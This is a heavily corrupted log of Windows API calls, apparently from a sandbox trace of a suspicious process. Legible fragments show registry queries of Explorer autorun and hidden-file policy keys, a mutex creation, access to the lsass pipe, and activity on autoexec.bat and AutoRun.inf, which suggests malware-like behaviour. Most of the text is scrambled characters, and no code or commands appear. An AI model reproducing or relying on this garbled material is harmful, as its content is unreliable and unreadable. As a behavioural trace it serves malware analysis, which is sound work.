5a"V47'5rd
2$7rdI
;181fcr5`8da744d","1768v{ `:8auvs",B
#gBd}oa
Whrdadb-2S@
@ESR",b1h0%
300b4"l#|py
brt@dd2dcs
3x0140t1 8
S!th32P2nseN
JD->14p12,"
yExeFi,d=>H
opMe.e8d2
101901q0"12
16.389b-217
;","9d$7(8c
f6ceb3w7t9d
2d79bcrgs57
ad1bfd$5$2d
adca81x1vc2
a8da74te2,"
468","2dwis
qy","R%fSre
weKeyE8V2,"
VCCESSb-20x
30000dp#<"h
fy->HK
BL_MAC
!lpSub
lftWar%]]ic
lsoft\
p NT\C5sben
Uersio.]Gin
311121r0"6.
;9","1w5(",
:dd688#gu6c
a376d9$4!d7
ac2fc5w5rd1
edd442$2bdc!a3(
?a"5b:ge223l+&)=:872=0aqr
dlry","RegSetValu|_xA90"SH]\erq
u.2X Vi
o;2$z3' ` <
`:s^=4s!:1'f<;tiif'Q:a"
t ba>kcd+{20{PuO
pu`de^
zExV",bRECV=PS"-"081 0%I3d4#,"(Juy8DKKEX_L
BQLJ6BCHHNEb-2le/vbKdy-~R_FA*BRE]Mi#s
w\Whnd/vc\}
qrentV%sciQ
_Explo2db\|
uanced
q\Hidd%oLSH5TALL"
B311121r0"6
O;9","1w5("
_:dd688#gu6]
a376d9$11d7	9a"
87'4cf2fcbc<=8o:ojlq)#+$su%,{"
YIJG\DCK
dR_j_Oj\RJ%
AU7	 <Rx.2
v !7m:2,ypug2qdr" <"	gwC)gqt>Iuy
zG.w CY
 <.kz <k2 <?a2 yj[i"/.P
QUJy.2t+Qez
f\Mhcr
rgRe,Tineow
fntWer
hgZM7{plnre
#Shdll
!D212021
)O!,"074
"- :`a0?
m`vfd44
84rd>c(00
14b9da
5<P-\!1778"
ptrx",
fryWal
dMLXQ/"STCC
#V!,"iKe
wE30010d
UalteN
md/=WqguX(r25W "tl; al3"mo3"^s1(M
j6( ,"9
>du7kVs\46d8d5
1fc474
g443d6
ekR)C;0fb24
9lR&G7d"-"1
=Vqeghst
3'fgCsea
dCVh3{W"-"S
CBGPW'*%
VOWSER
wrJmJ"QPofuwa
qosnft
ts\Bur
qsinn\
fr\Rhe
>L311021
!E;9"-"1
49 /&<bcbf:s
;4s	<1'N:;t
<f!`fdd
<fs`02)
fc25b8
`744d","1768
r bggis
|Puf[d{|aludEx
#,"SUCCESS",2}.2jKey1a2h
o2 18erM/"lqVa
f->Rta
u}q3]!dwUyp
,603^!lpEat
,6B+/Goctme
g Sdtt
bneute
brt!Me
u]RqkbtfU,^C0>pd%/ <~<`T	+c=Jn1 
o3)2111
i,#91##M2749",
8le9H;cfd6c
:d50d7
674cd1
gle;G1d6cdc
`24c8d
6<5kW/"1668
wem#,"
o`fOmgtf
2 $P <
rVkleNM
nu2:.uol"
090111212126NS:) ,"1[T:2XB;te>=)bfe6reb
6>a(`51d.9b
3nf$24bd bf
e<1#b6bdra8
98cr54b8}a7
5l'=+176)",
smbxxtry;,"
doJahnKexEx
"- EELJR
)LU ,"l
{=?[niuwart\
bzn|kft\Fi
rSFurrtn
dzrfin\P~l
hmrSBxpl~r
-;019!1
393>96.3)9
#96;5","8d
v89aea3eb~R5&LXf%
0v/T5$:
f$DSf&`dcaDP: 
0$c0gp644d3,"
6>;3("revis
sq!='Reg^pe
JmzT~W",3SU
BMPB%,"0i00
183t9","yKe
,6KZNY_CDRR
O\\D^ER"-"l0St`Ha|+9
pultVeb
mabfds\Eipl
090=4212'.3
8*--77483,"
el77?cfe'ce
2?7k0d51u79
b:gl>74bu1b
el5;?d6becax192eg72e|
c'dVf2p@3'^Z <V
eAwery
,JLU[E",#
Hey$>0x1
at^3e0+, LpVal<eName->OmNetKood"
P4>689"$A3' [ <#
'$];8coe6cdRzs]g9d<1d78
`57=bf
bfdd}42d6bdc`:180ec24b8da744TA.2
T4(jO b`gis
{2@APufo3%
HeyLxW"-
 OURL","#
s,!fy-7HIeY_LO
AL_MACHHLE",!lpSubKey->
.kswoso
qregtVesC +	_Poeicid
slo{ep
"2y190111200126-389","1748
du3ceb#S4t%
1fc<74be
g44;d6be
0|W;0fj26B8da7}4d","177:","qegistry","j
GhR",";1AS17Q2-
s8S30090e0#
k,(fy-7HKEX
6QEN]_WsER",klpSubKex/>Soetware\Micr
mgv\Cu
2gbrI,.=Sol`cierl
oorlr"
ctS:01810
2126g389","1668",!9dd688cfe6
Rf)dP3t29bc*
Q`t0J'$:742m6rdbQ}ug3fc;4r8e
rpTg",+1'
8","registry#."RegQueqyValue
U2`GDQ
)WB@","RI x7
;pl3009e0"-
blulNamd
2SroyepTiesM0Computes 
"10190111212
G3'18",
]:sgEu#?a37?d9d4
-scac2oc575
5u9edd=40D6bdc(8180fc25`8da444d","1768
{2)"ReG)ruB-giDH
bt!FA@LURD
efz/"hBey-?
\LOJAN
NE","lpRwbKez->Software
+ks&	q
^Glndo
qiog\PomY*-
q\Eqplos
1112x2126.388 ,"1448","9dd68
Q4t<d51
3bfmd443T
aa8880fb
fa7=4f
8","reghqtry!,"RegOpenK
GhSE.2C2AS@SS"
."hBey-?x
]CU[RENU
P",+lrsubKe0->Softw`pe\Mjcrosoft\Wi>
mg/;Ae
g~qVer
7m|h[C!%_Exylord
~^]!20890
01212126.389","0748","9fd688
`#26d9
^`s3F uc7bd8bfde
}v05bdja819
7'g7b8ma5
4d",k1768","sggiswry","RegQu
U2)"FAi$WBiJ.2#
fy-70x01
ytbf0"%"lpW
=16Maml-<noInt,rnetIcoo 
"10190111212yZ4>gP;2LJ3'18",ZQft
P:sgEu#5a37?d9d4
-siac2oc575
5u3edd=40D6bdc(8180fc25`8da444d","1768
{2)"Re
bb!FA@LURD
efl/"hBey-?
\LOJAN
NE","lpRwbKez->SOFTWARE
^Glndo_
%>piog\Shd\%
#npa}ibim
BppeiaAtion:\9dd688bde6cfb376d9d51dgP`sn
a%_]`t4bfd
_`tbI{qr3fc;4b8eQ~p~g"
auz221;10
.389k,"1748"- 9dd588cfe6ceb3
P`s7fc5
wr,5bdja819
/'z7b8ma745
shk2761".
regi:try","RdeOpemKeyExW","FA#NE^/ <:H.2mKey
TJ[y3]\Nc
NACAINE#
k(6PubBey-?
>"3tarl\OIcros&ft\Windnus\CvrrentVersi7
qL@xpl
s211;12
|:",+17
~|gd618cFd6ceb376d9d50f79bc2fc674bd1b
aq=180
/"1>68"-
;!Xjst{y",#b-#qsenBeyEy
xhbPUCJESs#,"0x000000e1
vf*Hey$>HkDY_CURRENT_UR
	qm!lpZubkdy->Software\Lk`rosofpYQindo
ay`s\E
29081120
-380","0
/"9md4
ceb376d8f51d49bc2fc574b
4raca8
Y6r9L"w
7d"%"177
qeg`strx
}fhfgQ|epYValu,ExW","F@KLURF","","hKey-R2h<\2 (\g ',"l@:c|I	LqlMn~ylCodmonFB&1Gp"
au	221;10
.389k,"1748"- 9dd588cfe6ceb3oZf)
Y3tGU`s7fc5
4bdja819
6b8ma745
3761".
regi:try","RdeOpemKeyExA","F
N.2mKey
OACAINE#
QubBey-?
UARL\OIcros&ft\Windnus\CvrrentVersig
o`dtibQ
kd=1MrkM 4F_{29D04Guyi
BEA$1068
vr;-0102
B303y9D}"
"32190211212126.3XT <N\5$@O.2<dd6
tvW:d58d79cS{"P674kd1bg
1d6kdaA8180/c24b8da664d"/"1768","re
?gwJpen
	}VRE+,""-
Tz->AKEY^
sO_MHCJiNE",klpSubKex/>Soetware\Micr
mvh2UyF
mgv\Cu2
g~88gbrI,.lSol`cierl
<@oorlr"
:01810
2126g389","1668",!9dd688cfe6
`#CXf)
[3t29bc
Z`t0B%$J742m6bdbQqu
3fc;4b8e
g",+15
8",";egistry#."RedOpenKeyExW
= <'0x0
Iz->AKEY^s
~FNTVUSES
}fAsSukKgY->So/tware\Mharoslft\WindowsD,wbV
pclon\
gc]m;0Flre{"
31182120
;9"%"3
48",k9dd688cgg6cea376d9d51d7I
f!gfdd
ec2=b8d`
}pL!,"8768#
s6Ldis}r{
,"Re.QueryVamweExT","FAILURE
/.5x00
_2 a@ <#L3
GoueGame,
+elnt{olP`
0111{12126.39;","2748","9dd6
HavIFauZC5&a9d5a
v8Fg1bodt45
!:Fgca11(0g
v9G;da>4$E","1768","refkstry","QegOpen3
6CYIURE
Rj[dIiv
IEYVLO
b@HIGE2
WaKep-.
pe\DicRosoft\Windows]AvrrentRersion
S0 )H2!0
226'389#
78"%"9de
i|Bee6je`
76d9-51d79bc3dc577bd1bfdd442\G`t'
:!hAds74b8
r&!,"{egirD;=</"RlgOpd
!fFxW+, sUCCE
S","0x012000f0","hKey->
4LDZUSE
Qeck&9
<SootwasU
arozoft]
mwsUCwRrent
ersion\Qmlicjes\Explore
C2!9B3!4212)@4>
:",+9dd7
g6clb377
3d70ba
fc57}bd1bfdd562d6adca8180fc2t
:t-E6$<P.24768R^ b
kcuR:b
 RenQuesI
weEqW",#
WRE+, 
,"hK,y->0x001200e3","lpValue
vVjlde
yu+221;126/
q}9/"1>48"-
a7x588jfg
beb3m6d9d51d6
:0/ec5>4`D0bfd>442d6bdc`8383fg24b8da74
C5&0Q.2R
eyvtry
KKnFxA+,"
T3CkKP",+0xp1@0
)f2"%"h
d{.>HKEY_CLASSES;!M_$Q.2
QegKey
:FLzB0j&7FE9-3
$59-X2D
-08002W00309D|\InPplcSer
A2!;011
pf<!17=8 ,"9dd788cfe6cdRzs'g9d<1f79bc2gc574bd1c
<7&72d?bbC`818jgc24b8d`
lgw!,"870
#,"r?fistry"- RedUueryValueE
$ <2'WSk1QCbX 2)"hK=
3",+lbValueOame->(nt\)%
";0390111312126.39
0741".
9dd698cfe6cec176d9d51g79bc2f
f$12d6
E: gK+tl;da>46d","1668","refYj0|z",+RggOpenJeyExW",#
LFSS+,$
x000)10e8","iIey-=HKEY_LOCAL
9CSD<LU
Y |uSubw
{=v&{cuM$
gtuy"L
"20190
:9"%"p748","9
:8cgU~'
`37?dxd51d79b
a575J#u
ddd=4sd6bdca8
544m"n
0768x,
 RenQ7EsyVa6u
EFSS+,`
,"hK-y*=8{001
:",+l2value	a
g-=SyrvfiVcs}pInProgr
[1(5T.2
B6(',"9@
du7kti
56d0d51e?(i
e1`fdd442d6bdca8QN2v
D6r=da7LBf2
T3'70#=
reg`st
egOien
","_AI
"",;hK
y->HJGZ[LOCA
Qe`Key
gntJOn
romSet\Control\M
"E2!5G3!0:1
06.:89b-
:",+9d
688cfe6ceb377d9d51d7;bc2fc57
ft142dr
fs1O3(1nc
`8dh74te
568+,"
egistry","RefOpenKeyGxW","SU+4GC'U.25x00
O <#`KO
/>HBEY
]MAJHI
rSukKe9,6Sy
vemUW@
";08y011121
326.391"
3741"%b9dd688
de6ceb255`<b2
F: dc24r@fq/L6t#
48"%"r
{",+Re
Tal|eE
WCCLSS
-"","hKey->0y
20e1",
mpValueName-?qfed"
"6519011uJ3"aJ4>o@;2DZ3'
@ <'9dd
4sdR{s
f9d<1d
a57=bd
bfdd44
f6bdc`
dc2=b8
a744d"
 1768#
eis}ry
*"RegO
gnKeyD
 SUJCEsS","0x000000d:!,"hKey);HKEY_
0K^A[.2p	QegKey
-G]]k,0
321;126/
."1>4:
-"9d>688cfe6b
4d9m53D69bchfc574bd1cffd746d6bdca81\IdsBM`(
 <'176
eyrL;=
."RlgQudJ0
nueLxW"-
AESZ".
ey->0x01
g8"%"nPWalu?Name->OsMocdfrTath"
K3">T1(<","
afe?cec2os 
f51m79bbj#'
54bm1rfef472d6bdca8180f/H6r`
c'PNf2)"17FB <^
 ,"[egPt=u<
clulEzG","S]CCESS",#zif
Iey$>&x000078e8","lqTaoueName->OsLo
;",*1749
fd608cFl6ceb3
4d9d50d79bc2fa574bd1b
f$<If&gdca
64d+,"16
 renists
PegFpgNKeyE1W","SUCBGSS"/"0x000000e|Y.280giqEJ[@Y_L;8C\
."lySubJU0i
QYS]EM\R
9011x212126.2:9",!1748","9dd
1'3d9d
a"gCvw
`d1kfdd5
`dch8181
`8dh76
d","x768","rdeistqy","RegQue
Tql	gUt+ <'SUCg9QC
{->9x0p1
:",+lb6alueOame->SysuemPcrtition"
nN2!aL3!4212AN4>OD;2-
:",+9t$7
g6clb3w7
3d70bqRfc575bd1bfdd562d6adca8180fc2
^.24768
kcuBxg
 RenQu%s
weEqW0L"SUCBESS","",#hKe{->0x000000
rFdlue^
ou1CQirTd,
crt`ty/o
001001q0
06.:8+B,"1758","9dd7:8cff6ceb376d9d
7'1bd1
ftDI0t6beaa82<0fc2
:tIJ6$
K4( ,"r
MpegKu9DHVg
 SUJCE
z0090"Pe8",#hKey->HJGY_LLCAL_MACHIN
6gi(>So
^]hCs.
mftUWy.e_v6
Aur{en4W
mn\Zef
#20190110012116.389","178F <:Gft
F:sce6cY
`c2oc%w5Ret
ddd=42$7
:189fqR4b8d`744d","0568"/"registry"H\Pu
TqiueE
-WSCERS ,!","hK
2 0N2 g8",
wuOAl$
<So|rs%QQu-
";01y1
321;6<S89",#1748","8fd68;cfe6ceb376
0vf574r
fca11(pgS3q
:da>44$#
48"%"`
gistsy","RegPweryUalueExW","k*AS
,Q2|] <'hKe
 ,"epF!mEd
oe-7So5s
0R0190011212127,389!,"1748","9
gr676d
H;rc2gc777bd1bf
c(380f
 17?8 ,"reghstry","SU.
gnKlyGxW","RUCCESS"-
20090g8","hJey->HKEXo
CL_DAAHINE"-"lpSubKd
mft~apE\Micsosoft\Wh
q\C|rpEntVession\Seu
111202126.388 /&1748")$>dd684
6ra1bf
4reC"x
:0fj24
6d"%"1
peg`st
ggQ|erYWalueExW","ST
Q",+",
iKey->0x000012f8","lpRdlueNa
ps`Pat(
012826
389","
548",#	v 
:8coe6
eb376d
f51d78
a57=bd
dfdd44
f6bdc`:180fc24a8da744
 b`gis
Pufa<!
{VaeueEy
QUCJEQs",""e"hKey->0y000200e8","lpV
ou(>Sev
csjc&1
aePhth"
390813
.389","1648"."9dd688cfe
4t<d51(
3bfmd443T
aa8880fb
fa7=4f
8","reghqtry!,"RegOpenK
AS@SS"
&x]."hBey-?x
&]LOJAL_L
LE"%"nPSubK,y->Softvcre\Nicrosoft\W
puktVe
QuuU3bp
"291900
xvL012?.388
}fO548+, 
dd68qcfe6ceb256d9g51d79bc2fc
6$7d6b4
w"Cfa7=4d"-
xsM:",+regh
 ,"[eequery
alueExW#."SU@CESS","","
2 50e8
g->ZervhS,
akChcheQ
0111{12126.39;","2748","9dd6
5&a9d51
f1bodd45
fca1180g
:da>46D","1~68","refkstrz","RegQuerQ
.2VUCC
/>0q0001
y!M ,"epVam
oe-7SgRvice
ackCachdRath!
"2019011
;2)"17
g6clb377Tp F3d70bc2g
ds@`d1kffD442d
bdca8181dc24a8da744d","
kcqry"$
ruok&94zW"%"SUBs
" ,"9x001
:",+hIEy->H
EY_LOCAM]MACKINE","lpSuR
uqwe\M	
dd]w+.
mwsUCursU'09grs`on\R
9011x212126.2:9",!1748","9dd
1'3d9d
a"gCwwY`d1kfdd5
{ [`dch8181
2vZ`8dh76
d","x768","rdeistqy","RegQue
 <'SUCS
{->9x001
:",+lpV`
$!"cme$>FRiver
achePati 
"10190111212	
3'18",J
`37?d9d4
-s]`c2oc575R,u
ddd=42d7J#'
:189fc25
544m".
0768x,"regisu
!qD RenQwEsyVa6ueExW",#
)GSS+, 
,"hK-y->0x001
:",+lrvalue	ame->DrhtfvFgd`ePath"
ft388cF
1'7Lp n3d70bc2gS|sh`d1kfdd5
z h`dch8181N$vi`8dh744e
tqn568+, Rdgis.ry","Ref
IeyLxU
CESS","1
atR200l8 
"hKe1->HKEY_M
-]MAJHKnE","+pSubKey,<Pkcrpire\Micro/
 "5190
z|j ,"8748#
k}0f681cfe7S-&e56d0d51e
~&60fc<74be
:53f44;d4Beca8k80fc24b9
9dl6d"%"3
78",xregistrx
ggQ|epYValu-ExW","ST
Q",+".
hKeyj>0x000012f<'*%dpValueNaE
0&+389
p /488jfe6bU+w{4d9m51d6	*'|dc5>4bd0J! )642m6bdb
`bw2fc;4`
ea74nd","1769
tq#{ncarmNhzat3on","Crd
wteqW 
ESS","0y
ata20e=".
lpNa*e->(nulm+!	
$5819011121
`#26d9
`s3V*qr6bd8bfde
}v"4bdja819
/'u6b8ma745
j3761",
rynchronizath
4qe CrlatELutexW","SUCB
h."0q00
100f0","lpNalg.>(nulh,$
:2)"9dH
g&bU*w
4d9m51d6	+'
dc5>4bd0R. $642m6bdbQ
2fc;4b8e
lgwf",+17
9","synchronh
;0-mn"%"CRdateMutexW",#
GSS+, 
x000x00f8","m
%,g->!nwLl)"
M"20190103152170);89","1W
`s7fc5
}vQ4bdja819
6b8ma745Tjh
3761","sM -Dvry+,"Rd
#\lKepEzw#,"S
CCESS",#
2009fa
-"hK?y->HKEY^
}N_MHCJiNE",jlpSubKex
Tdtwhrg|Micr(soft\WioflsvZD}rrentVer_
:)',"1
q|Nde6jeb36
-}J71d>9bc3V+q
6bd8bfde
svK4bdja819
6b8ma5
5d",x1768","s
?:Avry+, rdgQu?ryValueD
 SUJCGsS","j,"hKey-?
2009fa
alueNamd/=HjaKmvel"
4(=cfe
4t8L|uM59bj2fc4
}&N3bfmd443
n1Oaa8882Fb24bbda744d"-
:",+rgGhstr#","RegQtgryUelueExW","S
gi(>0x<
k(UTal|eNalUdzjmgLlvel#
219913
3121h6.389",#
 ,"0df
98cf?6ceb376e;d52`79bc2fc574Z
aq=180
."1>68"-
;!Ekst{y",#
=4rwerpVcLteEx
","FAILT
 ",+hIEx->0"000000fb ,"otValueName-
3)5111
kh?3741","8T-r&:cfl6cec
oe{;d58d5
cc2f9574bd1bg
0d6kdaA9180<c24b8da664d!("1768","reG
g~NeyE
;.""%"hKdQjz*z009000g
>npS|bKEx->AppLogLevd
1112v2126.388"."1778&,"9dd68
7!a79b
+"qf44;d6beK&|':0fj24b9
;d,6d"%"1
78","system"-
+vfLikrcRyA",eSUCCESS#, 0x74960000","d
VEUAPI~
x}=311;1213
gw6;",+1749
df)fd618cfd
$!m176m9d50
mjqa2fj57
cd1bfdd442d6c
92,380oc2
c8da744d","16
if> reniqTry",jRegOpenJ
iU",+FCiLUREe,"","hKd{.:HK@_XDOCAL_M=
abjsofx
RqfM!N|dfe{s2
w<;;0181"
a;%189+,2
648","9dd688b
6;ogb3>6t
e51d79bc2fc566bd1bfdg042d6bd+
5$1d",
.-tvry+, RegOpdnKeyExA#
]ACEZS 
"0x010000fc",#hKey->HIEY_LOC
JYKE",
jdtwhrg\Micrnsoft\Rpb
DN$001003
1212026.389",#1748",";dd688cv
1'3d9du
a"g3|s7`d1kffd442d7bdca8181
*v0`8dh76
d","0768","refistry", RegOpe
U2)"FA
.2#|k,Jgy-7HIEY_LOBAL_MACHH
f. lpZu`key->Roftware\Licrosofv\Windo
Aewren
d F`lg Execttion Opu
&*s^9dm6:
cfe6beb376d9d41d79bc2dc574bd=
6"a6bd_
`74=dZrpcTh;7adPoolThrotule"
"2019P
3!7121J
#,"0db
98cf?bceb376d9d51e79bc2fc574
3rcdd4
b24k8bA644dxx"1768","reghstry","Reg
g~NeyE
-""%"jKey->IKEY_LOC@
BHIGE$
"lpS<cKey->Sogtwape\PoliciesT
+22190110212126.2
#17=8$
98cfe6cec376f9d51d79bc2:
f!gfdd
fs`px|
gc2=b:da744e","1768#
rted"*
hbraryW"-"SUACESS","0x7
22)"lp
ou,v;4
st4'dnl"
"301901113
7.319$
#174b#,"9dd689cfe4ceb376d9d55
0vf574V
f$5zvr
eca11:4fc24c8
`744d#
78"%"`Ijesy<u
l","CrdateDileW","SUC
  }000
dNade/>\\.\QIPE\lsas
#dwMeuIredA$bess->GEOERIA_READ | GE
UBLTE"
; 0y)v
312?.189","0748","9e
bfe?ccB376due51d79bc3fc554bd1bfdd442
c(480fS
#17?8 
2fildsystem","CreateFhleW","
AS@SS"@
-"lyFoLuNam,,>C:\9dd688cge6ceb376d9
3t29bc
`t0*"v
542m6`dca8190fc24b8e
e",+dudesirddAccess-?GENERIC]READ"
2!4121
:)#df#
58"%";`d688bf
7ceb36
41d>9`C0fc564bd1bfdd542d6bdcc8180fc*
5$1d",j
.2g!(~
xstlm ,"ReaeFile","R
RS"%" 
"hFime->0x000100cc","lNumber#
qDjRea
1&#EN8
1199131212136.399",#
#,"0df
88cfd6ceb376d8d51d79ba2fc574
f$12d6
: g#qt
9da>46d","1668","fim%:=
uem+, WriteGile","ST
R",+"*
hFil,,>0x00012128!,"nNumberOr
kd`->6i
011;10126.389","1749
ed618eFe6ce+276d9d51e79ba2fc574bd1b
f&gdca
0$cp-%
54d+, 1768"-"filesyr
-"Rlabfhle"v#SUCCESS#,""."hFile->0x
as',"nF
MvC1=!
UoRlaf->65526"
021;14
/399x-"1748",#9dd488cfe6ceb3
3t29bcn
`t0*. 
542m6`dca8190fc24b8e
e",+11
8",".hlesystel","UriteFile",
QC',""
g=?x?t
10082:","nNtmberOfBx
nWr`tc
>655t7"
"20180113212126.399
:2)"9d`
g&b-+w
7d9m53d79bc3fc574bd0
542m6`Dba8190fc24b8d`744d","3768","N
qd`m",z
k|djef
TCCLSQ","",#hFile->1
100jc 
#nNulberOfBytdsToRead/>65536^
3)5111
0741"*
)dd6n9cfe6ceb376d8d51d79bc2f
5$gd1b
080oc0
c8da644d","1768","fildsystem*
 Gwitef
oR",+".
iFild->0x00000128","nOumberO&
{d`sTo
<&5536#
	"657>88;:2121>; <)(","174*18"9dd688cfe6ceb376d9d51d79bc2fv# 4zd1bfd}./2d6bdca8180fc24b8da+)*{","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748
,"9dd688cfe6ceb376d9d51d79bc2fc574bd]
0!399'
299+,"
#9dm68
bfe4ceb376d9d51d?
a%24bd
6"e>so
`8110f
`74=d"
#1748","filesyst!
gqaFil9
#",+hFim
y00902
cc",knNumberOgBytgsToRead->6
8",+1749
ed618aFe6ce+376d9d51e79ba2fc574bd1b
f&gdca
54d+,"16
#fieeqYstemk,"WriteFhle"."SUCCESS",2
k|`->0L
OumkerOg
rTo^rkTe->6|536"
"21190311212126.3a
5$=","E
276m9d50
b2fj57
bd1bfdd442d6beca8180fa24b8da
 !268"
-"Rlaffole"|"
TCCESS",""-"hFile->0x
2 50cc"
xtezTmrbad-d6
"20180111212126
;)',"1
ge6je`
16d945
e79bc2fc575bd1bfdd442<
`tfa81H
e",+15
?","<i
dsystem","VriteFile",
WSFESS
1x0902
728"|"
OumberOfByuesToWrite-
026'3;
%,"1m4
#,"9dd688cge6ceb376d9d
3t29bc*
542m6`Dea81h0
b24b8da744e","1768","^
nuvyst5
#,"ZUAcBSS"v"
-"hFile->0y000000cc",R
Lehber
,>6<51
80111212127.399","174
.2<dd6
8d58d5
ec2f95
5bd1bfdd443d6bdca8180
0$g8da
#fieeqYutemr,
VriteFile"-"SUCCESS",:
.2mFilU
#,"gNwMeerO<B
uesToWrite,>20342"
3)5111Z
0741".
?dd6h8
ge6ceb376d8d51d79bc2f
5$gd1b
080oc0
e8dam4
e","1768",#filesystem
 B`adF
#,"+, H@ile}>
y000000cc"-"nNumberOf
vuvToRu
#20892
6121h1
7.399","1758","9dd688S
g&feb3
gc5>4`D7bfd44
3d6bdca8181fc24b8da74\
 <'176
l",+CmP~Fil?E
V","SUCCESR","","lpEx
vykgFi
e681cdE1cebi7
e9d51d79bc3fc574bd1bf
6$7d6b
ea7=4f
GileName->B:\AutoRun.u
/390".
7748r,
8dd688cfe6beb376d9d51,
;rf2fcU
e6bmcc
680f92
c8da744d",#1768","fil
{cqem"
#,"ZUAcCSS"|"
y000000cc"-"lpFileNam
<S?\9d
7d9m53D09bchf
474bd1bfdd542d6bdca81
ds74b8l
rirldCCeess}>
DNERIC_REAE"
"201901
0!7126n
#9dm6:
dfe69e
276d9d51d78bc2fc574bdQ
dta442
5b8ma5
2d",r1
78","filesxstem","Rea
k|`","
iFiee/
7x00j0
1cc","nNumcerOfBytesT
gqa->2
021;10
)399x,
0748","9dd788cfe6ceb3?
f)a51d
cfdm46
c6bd9a
080fc24b8d`744d","176x
.2cile+
 <#3]h
ueF`leV"-"SUCCESS","0x0H
2 5cc"
?C:UAUUODXEC.BAT","dwDe
puaAcc
111821
126.399","1749","9dd6:8cfe6c
;t01d7
7'5*-u
gdd=42d7
9189fa
4b8d(744d","1668"."filesysteu
ctCile
#,"aFild
100902Cc","'NumberOfCyteqToRead->26X
2!<011
4>2qpfR#17=8",#
5 I98coe4Ceb37
d9d51d79cc2fa574bd1bfdd
fsd818
#,"8768#
mespsvEm","
reateFildW", SUCCESS","
2 fc",6
g^`%,iDB:\0dd69
7cek35
d9d5xd79bc2fc474bf1bfdd442d6Z
: cc24>
6t#dk 
Ees`red@
r->NELeRIC_
"21190311212126.3
5$=","
avd~*!
276m9d50
b2fj55
bd1b/dd442d6beca8380fc24b8da
 !268"
qir<,)V-"C{eatd
V",+SWcCESSk,"0x0000112c ,"lpFileNa}
^QPTOEl
V2-j-36dsi{edAb
,>GLNGrIC_R
"20090131212126.39a
6(',"9
du73,&C66d0d51e
3fc<76Bd1bf-d442d6bdba81:0fc24b8da7
3'38",
{cu-%fB#CrlateG
$!8#,"ZUCcESS","0x00000030","lpDileNam
CEQOEXI
,uy-ehNewDlsird
dss$>GeNERIC_READ | FENERIC_URITE"
2!4121f
;)#dju]58"%"9de
ge6jeb
76d9d51d79bc2gc574bd1`fdd442
:!=0fc
5$5,dhJ0761","g
xstlm"
"CreateFileW"-"SUCCESQ","0x0
a2)"lp
H]PIYE\lr
#,"mwDEsiredAccess->FENERIC_PEAD | O
AORRITi
2!8xyuU312826.2
qfI#17=8"
"9dd688cfe6cec376d9d53d79bc26
f!gfdd@
idSgc2=b:D`7447","1768","dewice","Devi
1#,"+, HEevi0e->0x00000125","dwIoCon
m|Fode
hkA-"lyIlbtffe.->0x00000000#,"nInBuffez
kj`->0X
qOu}BwFger-b0x0120f37c",#nOutBuffer
xu(>0xh
2(#dk(
CytlsReu
e->9x2
20f3~4","lpOvdrlarped->0x000H
jm89"%"1
h}8dd?88Cfe6ceb376d9d50d79bc2fa574bd1
0t3bdc
a"5*q =644m","0
-"f`lgSyste$","CreatdFilgW","SUCCES[
2 5001
;le-7\\.]
>15uPo`nvmanag,r","dwDerirefAccess->AT
3!3yzuj7.309",#
pa#,"0dd
88cfe6ceb376d8d51d79ba2fc574
f$12d6
: g+up49da>44d#
eu`78"%"dEvice","DeviceHoContron","FAI
 2)"hDa
< yxxtd112=","e
nnt{olcode->0x006d0018","lpIlBuffer
6)gb00n
@eg.#6
hze$>0x1
vtc146+,"LpOutBuffer->0y00498782","nOu
pClze-
2 1zwf|#lpKyter
"0$snem->
x0120f374","lqOverlapred->0x
3!3yzu|7.309",#
pw#,"0dd
88cfe6ceb376d8d51d79ba2fc574b
f$12d6F
: g#qt.9da>44d#lku{78"%"dew
*!o-"DlviCeIoControl",#QUCCESS"/"","hD-
2 5012L
B/-48nlCfde-?p1tz7d0908"-
oBuofeR->0x0049bb00#."nInBufeerSize
6&',"l
dvd2n~xy00=8611pkhjoOu}Bufg
 {e-70x
00000ee","lpC{tesRetuqned->0
.2ipOvM
-w100900
"20190111212126.398","174h
.2<dd6P
c"8d58d7
rc2fc574bd1bfdd442d6beca8180
0$g8da
qi#renisTsy","RegOpenKeyExW","RUCCESS
  }000
,=n?HKLY_CT
U_UZER
-"lpSubKey->Snftware\Oicroso
Tus; +,]Exylmrer\M%untPointr2\CPC\Volume"
0 4901i
0&/{p}c-"1>4:","9d.688cfe6cdb376d9d51d79bcJ
a%24bd
6"e~+ #`8110dc24b8.a744d","0768","registry
 B`gOp
jBCEZS"
#0x00000138","hKey->0y000001
 <'lpSu
j0Z792$8e
0-11e1-9999-806d6172686f}\"
0 4901	
-"1>4:
-"9d>688cfe6ceb377d9d51d79bcj
a%24bdA
:7_`8110dC34b8>a744d","1768#,"registry
 B`gQu
#SUJCESRbef
-"hBey-?
10083:
alueNamd/>Dawa"
"20190
1)<","
 )e$ux
bfe?ceb2w
e51m79bb
64bm1`Fdd44{d6bdca80:0fc14b8da744d"
gwlstr)
SxEx^","R
sRS"%"0x1
038+, HKey-wHKEY_CUSPENT\USER","lpS
vgdre\
)Zeowz\Cus2,*@Werzion]
)4Ynre{\OOuntP&ints2\CQA\Vooume"
4>699",
 <#y'$
98coe6cd"zs
e9d<1d78
2vUb57=bf
bfdd}42d6bdc`:180ec24b8da744L
 b`gis,
3%^JeyLxW"-b
sBESZ","1
101;4 
"hKe0->0x00012138!,"lpSubKey
0==e41
;)8ynx
7d687268v/9r#
312824
399"e"1748",#;dd6;8cfe6ceb37
a"cc57<
ft5tq$
cdch8181&*v
c8dh744e
668+, Regis=ry","RefSuerzValueExW",
 2)"hK
2 1psq
5",+lpV`,<!d`me$>Geo
#%_hon+
2019y111212134.39:","1748","
aug376
5)c#q&K474kd1bg$-p
3d6kdca9
itOb24k8fA744dk,"1768"- filfsystem","C
 <'SUCS
  ypsp
112=","m0
-JdNade->]
jnun}PmIntMa'ager","euDesjredAccess-
3"0rrr
/390","0w}|
-"9md689
beb:74D9d51-79bc2fc454bd2bfdd442d6b
6r=da7
3'7:!('bb~`in.!,Kugice[|C{{beot;6"]]TRJrE"
NcM_CHI
"dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBuf\^rSize->0x00000208","PMqJ4
7%" r->0x0vsqp/
|obmnOutBu677!
<,2ug0x00000008","lpBytesReturne>vbm&0120f884","lpOve-
apped->0x00000000"
.22748
4(9K!!
beb:76d8T}uE69bj2fc4
s&F0bfmd4
2d6bdca8180fb
ea7=4d
,"1768","fildqystem"/&Create>
Q2)"0x
e(lGillNamd
A/\MfuntQ
.*jLanhgeR","dwDesired@
+!lr->HTTrIBUTES"
"200;0111211526.399
